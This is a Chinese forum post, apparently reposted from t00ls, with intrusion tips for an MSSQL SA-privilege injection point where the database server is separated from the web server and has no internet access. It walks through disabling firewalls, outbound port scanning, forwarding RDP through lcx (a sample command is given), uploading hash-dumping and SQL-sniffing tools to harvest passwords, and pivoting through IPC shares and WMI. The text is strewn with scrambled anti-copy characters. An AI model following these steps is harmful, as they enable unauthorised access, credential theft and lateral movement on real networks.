当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。* ?7 S! U" W( H! Y2 ]( ^
: s2 Y' N7 |5 i# s+ u
9 Y8 y5 _ N$ l' O* [
3 S, F7 S7 p( @& s2 l5 k
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)+ k9 A$ u7 D! F
8 I- U1 Z$ m# L4 z4 ~9 K# g) M" t2 Y4 e" m& ^. u) n) Y
一、DB机有公网IP.
" a# ?5 e4 A; ^5 _" z* o6 P$ s& ~
# h* b7 B0 @$ k2 |1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
6 B# t" P( x" B6 S$ d# e p
5 S) a! D) W0 y [, I$ a
- h/ l1 n$ j9 K; G# F2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.# E# H( q; A+ B9 W1 _# P% N Q
: H% U' V) H' E; a) _2 Z9 D2 V- J& B2 k2 ^
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
6 Q7 W; Q. P1 N% a: x$ n7 i
% ~8 ^( `( r/ l5 s% |# b1 C, G$ ?
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
4 Y7 z$ ~- J( U/ g
- }: H1 [) @: @+ i( C
) j/ f+ x& T! n& ~! B7 ]8 |" [5 {# A6 O1 j9 k% H$ W6 z s
二、DB机只有内网IP" d( n9 A3 ^ ?. K! O" s" Z& f
0 p& d( T6 F7 J& w
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等." Y' B* g8 t/ P" I
. E2 y2 C# y, Z/ i; r" \, @
4 Q% \" z. l8 ~+ Q% r( v2 P
2:停掉防火墙和IP策略再从内往外扫描.
! T$ L* n/ c n) o0 A) ~5 l% o4 ^% s: d3 I4 l w. p
- U s, ~" c1 H, X X3 O- ?0 h5 N& j
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
9 D8 [: ]0 h Y$ j2 j% k9 M+ |7 b' r" ]. M
' B9 w, }, l q; x4 }) }
4:学会密码规律分析往往会有惊喜.
* _+ U" {0 [ r( E; k" R" g/ N+ J' k3 S& f) a V* p H
4 h* g z: P% M$ }# E
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等* V, a4 `# L( c r' @/ h
" H [6 j W C: T& L
- @, z2 b! B; \" j有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对